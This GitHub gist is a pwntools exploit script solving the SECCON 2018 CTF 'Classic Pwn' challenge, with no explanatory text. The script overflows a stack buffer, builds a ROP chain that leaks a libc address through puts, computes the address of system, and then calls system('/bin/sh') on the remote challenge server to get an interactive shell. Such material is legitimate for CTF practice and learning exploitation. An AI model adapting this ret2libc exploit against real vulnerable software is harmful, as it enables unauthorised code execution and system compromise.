Skip to content

Instantly share code, notes, and snippets.

@ywkw1717

ywkw1717/classic_pwn

Created Oct 28, 2018
Embed
What would you like to do?
SECCON 2018 Online CTF Classic Pwn
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./classic_aa9e979fd5c597526ef30c003bffee474b314e22")
conn = remote("classic.pwn.seccon.jp", 17354)
elf = ELF("./classic_aa9e979fd5c597526ef30c003bffee474b314e22")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253")
popret = 0x400753
# first payload
payload = "A" * 72
payload += p64(popret)
payload += p64(elf.got["gets"])
payload += p64(elf.plt["puts"])
payload += p64(elf.symbols["main"]) # return address
conn.recvuntil(">> ")
conn.sendline(payload)
conn.recvuntil("Have a nice pwn!!\n")
leak_addr = u64(conn.recv(6) + "\x00\x00")
libc_base = leak_addr - libc.symbols["gets"]
system_addr = libc_base + libc.symbols["system"]
print "libc_base: " + hex(libc_base)
print "system_addr: " + hex(system_addr)
# second payload
payload = "A" * 72
payload += p64(popret)
payload += p64(libc_base + next(libc.search('/bin/sh')))
payload += p64(system_addr)
payload += p64(0xdeadbeef)
conn.recvuntil(">> ")
conn.sendline(payload)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.